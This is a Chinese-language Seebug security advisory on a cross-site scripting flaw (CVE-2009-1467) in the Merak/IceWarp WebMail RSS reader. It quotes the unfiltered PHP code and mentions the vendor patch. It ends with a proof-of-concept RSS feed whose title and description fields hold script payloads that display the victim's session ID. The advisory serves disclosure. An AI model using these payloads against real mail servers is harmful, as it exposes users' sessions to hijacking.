Merak邮件服务器RSS源阅读器跨站脚本漏洞

2009-05-06T00:00:00
ID SSV:11211
Type seebug
Reporter Root
Modified 2009-05-06T00:00:00

Description

BUGTRAQ ID: 34825 CVE(CAN) ID: CVE-2009-1467

Merak Email Server是一个全面的办公室局域网或Internet通讯邮件解决方案。

Merak邮件服务器的WebMail用户可以向其文件夹列表中添加RSS源作为文件夹,这些源是由html/webmail/server/inc /rss/rss.php文件解析的,并在html/webmail/server/inc/rss/item.php文件中处理RSS channel中的每个item元素。

getHTML()函数中汇集并返回了条目的最终HTML页面,title和description对应源中的<title>和<description>元素,href对应<link>元素:


159 public function getHTML(&$aItem) 160 { 161 $aHTML['title'] = $this->subject; 162 $aHTML['href'] = $this->to; 163 $aHTML['description'] = Tools::cleanHTML($this->body,$base); 164 165 $aURL = parse_url($this->to); 166 $aItem['base'] = $aURL['host']; 167 168 @$sHTML = htmlspecialchars( template('inc/templates/rss.tpl',$aHTML) ); 169 170 return $sHTML; 171 }


cleanHTML()函数仅对描述执行了过滤,而title和href未经任何修改便嵌入到了最终的HTML页面中,也就是当用户点击显示条目的时候,会执行用户所订阅到的RSS源条目的<title>或<link>元素中所嵌入的HTML或JavaScript代码。

Icewarp WebMail Server 9.4.1 Icewarp


目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=http://www.icewarp.com/ target=_blank rel=external nofollow>http://www.icewarp.com/</a>

                                        
                                            
                                                &lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;rss version=&quot;2.0&quot;&gt;
&lt;channel&gt;
    &lt;title&gt;RedTeam Pentesting&lt;/title&gt;
    &lt;link
      href=&quot;http://www.redteam-pentesting.de&quot;
      rel=&quot;self&quot;
      type=&quot;application/rss+xml&quot; /&gt;
    &lt;link&gt;http://www.redteam-pentesting.de&lt;/link&gt;
    &lt;description&gt;Seeing your network from the attacker's perspective&lt;/description&gt;
    &lt;pubDate&gt;Mon, 16 Apr 2009 05:23:42 +0000&lt;/pubDate&gt;
    &lt;language&gt;de&lt;/language&gt;
    &lt;item&gt;
      &lt;title&gt;&amp;lt;script&amp;gt;alert('Title: Your session id is: ' + \
window.top.sSID);&amp;lt;/script&amp;gt;&lt;/title&gt;  \
&lt;link&gt;http://www.redteam-pentesting.de/pentest&lt;/link&gt;  &lt;pubDate&gt;Mon, 16 Apr 2009 \
05:23:42 +0000&lt;/pubDate&gt;  &lt;description&gt;
        &amp;lt;div o&amp;lt;xml&amp;gt;nmouseover=&amp;quot;alert('Description: Your session id is: \
' + window.top.sSID)&amp;quot;&amp;gt;  RedTeam Pentesting XSS
        &amp;lt;/div&amp;gt;
      &lt;/description&gt;
    &lt;/item&gt;
  &lt;/channel&gt;
&lt;/rss&gt;